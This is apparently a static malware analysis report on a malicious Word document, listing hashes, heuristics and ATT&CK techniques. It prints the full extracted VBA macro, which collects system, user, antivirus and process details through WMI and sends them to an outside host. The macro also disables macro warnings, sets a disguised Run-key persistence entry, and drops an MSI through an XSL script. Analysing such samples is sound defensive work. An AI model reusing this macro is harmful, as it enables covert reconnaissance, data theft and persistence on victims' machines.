Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3a0b8a54cd4caab9…

MALICIOUS

Office (OOXML)

573.6 KB Created: 2020-11-02 14:53:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2021-10-23
MD5: bfb115e53a2519dc124a9f59535c8c50 SHA-1: fcfdef03e3304f79c9f80b29bd140cefc20687fa SHA-256: 3a0b8a54cd4caab9be0624b4d4a1762051c41eb1503b26c7a622cebbc684045a
498 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32 T1047 WMI

The sample contains a VBA macro that executes upon opening the document, as indicated by the Document_Open heuristic. This macro uses obfuscated strings and WMI calls (GetObject("winmgmts:")) to execute commands and gather system information, likely to prepare for or download a secondary payload. The use of WMI to create processes and the obfuscation techniques suggest a downloader or initial access stage.

Heuristics 13

  • VBA project inside OOXML medium 10 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<msKOLISON:script language='JScript' implements-prefix='user'>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "var nSaksadkasdJSDksdADasd = new ActiveXObject('WScrIpT.SHeLl');"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "nSaksadkasdJSDksdADasd.ReGWrItE('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\" & VERXPEA & "\\Word\\Security\\VBAWarnings','1','REG_DWORD');"
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<msKOLISON:script language='JScript' implements-prefix='user'>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "var nSaksadkasdJSDksdADasd = new ActiveXObject('WScrIpT.SHeLl');"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "nSaksadkasdJSDksdADasd.ReGWrItE('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\" & VERXPEA & "\\Word\\Security\\VBAWarnings','1','REG_DWORD');"
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "var pxDolaSdsa = new ActiveXObject('Scripting.FileSystemObject').GetSpecialFolder(2);"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "nSaksadkasdJSDksdADasd.ReGWrItE('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Defender Update','msiexec /i ' + pxDolaSdsa + '\\uWtbFEbPUT.msi /q','REG_SZ');"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "var lwgtdVUpgg = new ActiveXObject('Microsoft.FreeThreadedXMLDOM.1.0'); lwgtdVUpgg.async = false; lwgtdVUpgg.load('h'+'t'+'tp'+'://microsoft.office.online-templates.net/save.php?log=' + encodeURIComponent('" & current_id & "|" & ZUSBEFIUYR & "'));"
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set FBYDMPNRTP = GetObject("winmg" & "mts:{imper" & "sonationLevel" & "=impersonate}!\\" & IQDMWHGMGX & "\ro" & "ot\ci" & "mv2")
Set lsxQYuDfqR = FBYDMPNRTP.ExecQuery("Sel" & "ect * " & "from Win32" & "_Opera" & "tingSystem")
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Set FBYDMPNRTP = GetObject("winmg" & "mts:{imper" & "sonationLevel" & "=impersonate}!\\" & IQDMWHGMGX & "\ro" & "ot\ci" & "mv2")
Set lsxQYuDfqR = FBYDMPNRTP.ExecQuery("Sel" & "ect * " & "from Win32" & "_Opera" & "tingSystem")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    ETXLUSMDWU = CreateObject("WScript.Network").UserName
ZUSBEFIUYR = ZUSBEFIUYR & ETXLUSMDWU & "|" & current_id & "|"
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set FBYDMPNRTP = GetObject("winmg" & "mts:{imper" & "sonationLevel" & "=impersonate}!\\" & IQDMWHGMGX & "\ro" & "ot\ci" & "mv2")
Set lsxQYuDfqR = FBYDMPNRTP.ExecQuery("Sel" & "ect * " & "from Win32" & "_Opera" & "tingSystem")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Dim CSYFrbpHBYXWBkB As String
CSYFrbpHBYXWBkB = Environ("Temp") & "\" & Int((999 - 100 + 1) * Rnd + 250) & ".x" & "s" & "l"
Dim EmscOlKTVMopyog As Object
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://www.w3.org/1999/KENZ/TransformIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9932 bytes
SHA-256: dd9ba6db4f147784cfa4f7226cc7b856c608bb14847fc728fe66770afdb2670c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
ScaleInlineShape
ActiveDocument.Shapes("text").Visible = msoTrue
ActiveDocument.Shapes("text").Left = 0
'IcJayvHFEnIDSPG

End Sub

Sub ScaleInlineShape()
On Error Resume Next
Dim intScale As Integer
intScale = 0
With ActiveDocument.InlineShapes(1)
  .ScaleHeight = intScale
  .ScaleWidth = intScale
End With
End Sub

Sub IcJayvHFEnIDSPG()

On Error Resume Next

IQDMWHGMGX = "."
current_id = "asdsadsadsadsad"

Set FBYDMPNRTP = GetObject("winmg" & "mts:{imper" & "sonationLevel" & "=impersonate}!\\" & IQDMWHGMGX & "\ro" & "ot\ci" & "mv2")
Set lsxQYuDfqR = FBYDMPNRTP.ExecQuery("Sel" & "ect * " & "from Win32" & "_Opera" & "tingSystem")

IQDMWHGMGX = "."

ZUSBEFIUYR = ""

For Each cfKqFQyhdp In lsxQYuDfqR
    ZUSBEFIUYR = ZUSBEFIUYR & cfKqFQyhdp.Caption & "|"
Next

Set FBYDMPNRTP = GetObject("win" & "mgmts" & ":\\" & IQDMWHGMGX & "\root" & "\Securi" & "tyCenter2")
Set colItems = FBYDMPNRTP.ExecQuery("Sel" & "ect * " & "From " & "AntiVirus" & "Product")

ETXLUSMDWU = CreateObject("WScript.Network").UserName
ZUSBEFIUYR = ZUSBEFIUYR & ETXLUSMDWU & "|" & current_id & "|"

Set objWMIService = GetObject("win" & "mgmts" & ":\\" & IQDMWHGMGX & "\root" & "\cimv2")
Set colProcess = objWMIService.ExecQuery("Select" & " * from " & "Win32" & "_" & "Process")

For Each objProcess In colProcess
    strList = strList & "," & objProcess.Name
Next

For Each objItem In colItems
     ZUSBEFIUYR = ZUSBEFIUYR & "|" & objItem.DisplayName & "|" & objItem.productState & "|"
Next

ZUSBEFIUYR = ZUSBEFIUYR & strList

VERXPEA = Application.Version
doxid = Split(VERXPEA, ".")

Dim IcJayvHFEnIDSPG
IcJayvHFEnIDSPG = "<?xml version='1.0'?>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:stylesheet version='1.0' xmlns:KOLISON='http://www.w3.org/1999/KENZ/Transform' xmlns:msKOLISON='urn:schemas-microsoft-com:KOLISONt' xmlns:user='urn:my-scripts'>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:output encoding='utf-16' omit-xml-declaration='yes'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:param name='norefcomma'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:output method='xml' omit-xml-declaration='yes' indent='yes'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<!-- Root template selects all children of the CIM/DECLARATIONS tag -->"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:template match='/'>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:apply-templates select='COMMAND//RESULTS//CIM//CLASS'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:apply-templates select='COMMAND//RESULTS//CIM//INSTANCE'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "</KOLISON:template>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<!-- CLASS template formats a single CIM non-association class  -->"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:template match='/'>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:apply-templates select='COMMAND//RESULTS//CIM//CLASS'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:apply-templates select='COMMAND//RESULTS//CIM//INSTANCE'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "</KOLISON:template>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<!-- CLASS template formats a single CIM non-association class  -->"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<msKOLISON:script language='JScript' implements-prefix='user'>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "var nSaksadkasdJSDksdADasd = new ActiveXObject('WScrIpT.SHeLl');"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "nSaksadkasdJSDksdADasd.ReGWrItE('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\" & VERXPEA & "\\Word\\Security\\VBAWarnings','1','REG_DWORD');"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "dwvpPimdfXnjAxN = new ActiveXObject('Microsoft.FreeThreadedXMLDOM.1.0'); dwvpPimdfXnjAxN.async = false;"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "function s2f(pth, data) { var UFCSWIEKJG = new ActiveXObject('Msxml2.DOMDocument'); var exed='baKILEKse64'; var onode=UFCSWIEKJG.createElement(exed.replace('KILEKs','')); var zartical = 'bin' + '.ba' + 'se64'; onode.dataType = zartical; onode.text = decodeURIComponent(data); onode.nodeTypedValue; var xdola = 'ADODBREPLACED.Stream'; var bs = new ActiveXObject(xdola.replace('REPLACED','')); var typed = 'REPTIL1'; bs.type = typed.replace('REPTIL',''); bs.Open();bs.wRiTE(onode.nodeTypedValue); bs.sAvEtoFIle(pth);}"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "var pxDolaSdsa = new ActiveXObject('Scripting.FileSystemObject').GetSpecialFolder(2);"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "nSaksadkasdJSDksdADasd.ReGWrItE('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Defender Update','msiexec /i ' + pxDolaSdsa + '\\uWtbFEbPUT.msi /q','REG_SZ');"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "var lwgtdVUpgg = new ActiveXObject('Microsoft.FreeThreadedXMLDOM.1.0'); lwgtdVUpgg.async = false; lwgtdVUpgg.load('h'+'t'+'tp'+'://microsoft.office.online-templates.net/save.php?log=' + encodeURIComponent('" & current_id & "|" & ZUSBEFIUYR & "'));"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "var mpgDDHHiZT = 'uWtbFEbPUT.mDOPASTRsi';"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "function extract() { var ZipFile =  pxDolaSdsa + '\\ket.zip'; var ExtractTo = pxDolaSdsa + '\\'; var fso = new ActiveXObject('Scri'+'pting'+'.File'+'SystemObject'); var objShell = new ActiveXObject('Shel'+'l.Applic'+'ation');var FilesInZip=objShell.NameSpace(ZipFile).Items(); objShell.NameSpace(ExtractTo).cOpYHeRe(FilesInZip, 16);}"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "s2f(pxDolaSdsa + '\\' + 'ket.zip',decodeURIComponent('" & UserForm1.TextBox1.Text & "'));"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "extract();"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "var petx = new ActiveXObject('Scripting.FileSystemObject').DeleteFile(pxDolaSdsa + '\\' + 'ket.zip');"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "</msKOLISON:script>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:template match='CLASS'>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<DIV CLASS='mofclass'>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<SPAN CLASS='mofqualifierset'><KOLISON:text> </KOLISON:text><KOLISON:apply-templates select='QUALIFIER'/><br/></SPAN>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<SPAN CLASS='mofkeyword'>class</SPAN>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:value-of select='@NAME'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:apply-templates select='CLASSPATH'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:if test='*[@SUPERCLASS]'>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<SPAN CLASS='mofsymbol'>: </SPAN><KOLISON:value-of select='@SUPERCLASS'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "</KOLISON:if>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<BR/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<SPAN CLASS='mofsymbol'>{</SPAN><BR/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:apply-templates select='PROPERTY'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:apply-templates select='PROPERTY.ARRAY'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:apply-templates select='PROPERTY.REFERENCE'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<KOLISON:apply-templates select='METHOD'/>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "<SPAN CLASS='mofsymbol'>};</SPAN>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "</DIV>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "</KOLISON:template>"
IcJayvHFEnIDSPG = IcJayvHFEnIDSPG & "</KOLISON:stylesheet>"

Dim CSYFrbpHBYXWBkB As String
CSYFrbpHBYXWBkB = Environ("Temp") & "\" & Int((999 - 100 + 1) * Rnd + 250) & ".x" & "s" & "l"
Dim EmscOlKTVMopyog As Object
Set EmscOlKTVMopyog = CreateObject("Scripting.FileSystemObject")
Dim egxBWMbXluAXjRC As Object
Set egxBWMbXluAXjRC = EmscOlKTVMopyog.cReAtETexTFile(CSYFrbpHBYXWBkB)
Dim vasRaEgJyi, hspENDxPDF
vasRaEgJyi = Replace(IcJayvHFEnIDSPG, "KOLISON", "xsl")
hspENDxPDF = Replace(vasRaEgJyi, "KENZ", "XSL")

egxBWMbXluAXjRC.wRiTeLinE hspENDxPDF
egxBWMbXluAXjRC.Close

Set QErkzcyJlkQoVLw = CreateObject("Microsoft.XMLDOM.1.0")
QErkzcyJlkQoVLw.async = False
QErkzcyJlkQoVLw.Load CSYFrbpHBYXWBkB
QErkzcyJlkQoVLw.transformnode QErkzcyJlkQoVLw
EmscOlKTVMopyog.DeleteFile (CSYFrbpHBYXWBkB)

End Sub
Sub LinkUn()
    Application.DisplayAlerts = False
    On Error GoTo Destroy
    ThisDocument.AttachedTemplate.Saved = True
    CurrUser = Application.UserName
    tmpLoc = "C:\Users\" & CurrUser & "\AppData\Roaming\Microsoft\Templates\Normal.dotm"
    ActiveDocument.AttachedTemplate = tmpLoc
    ActiveDocument.AttachedTemplate.Saved = True
    ThisDocument.Saved = True
    ActiveDocument.Saved = True
    ThisDocument.Close savechanges:=False
Exit Sub
Destroy:
    Call ThisDocument.DeleteVBAPROJECT
    ThisDocument.Saved = True
    ActiveDocument.Saved = True
    ActiveDocument.AttachedTemplate.Saved = True
    ThisDocument.Close savechanges:=False
End Sub
Sub DeleteVBAPROJECT()
    Application.DisplayAlerts = False
    Dim i As Long
    On Error Resume Next
    With ThisDocument.VBProject
        For i = .VBComponents.Count To 1 Step -1
            .VBComponents.Remove .VBComponents(i)
            .VBComponents(i).CodeModule.DeleteLines _
            1, .VBComponents(i).CodeModule.CountOfLines
        Next i
    End With
    On Error GoTo 0
    ThisDocument.Saved = True
    ActiveDocument.Saved = True
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A5DA9B00-4E1C-4361-B676-FD4855C7068F}{C31E4006-510C-401B-BF9F-77E04077DAE7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox2_Change()

End Sub

Private Sub TextBox3_Change()

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 793088 bytes
SHA-256: 776550fe05627a5c26ed2cc9a41abaab6268be91aa9469079bd1797bf7896785
Detection
ClamAV: No threats found
Obfuscation or payload: likely
10300 of 12750 identifiers look randomly generated (e.g. 'BqygTJwrEjpe08kRt51KwXNYbkFgYerfIQIi1Cwy') — consistent with name-mangling obfuscation. Carved artifact contains 564 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.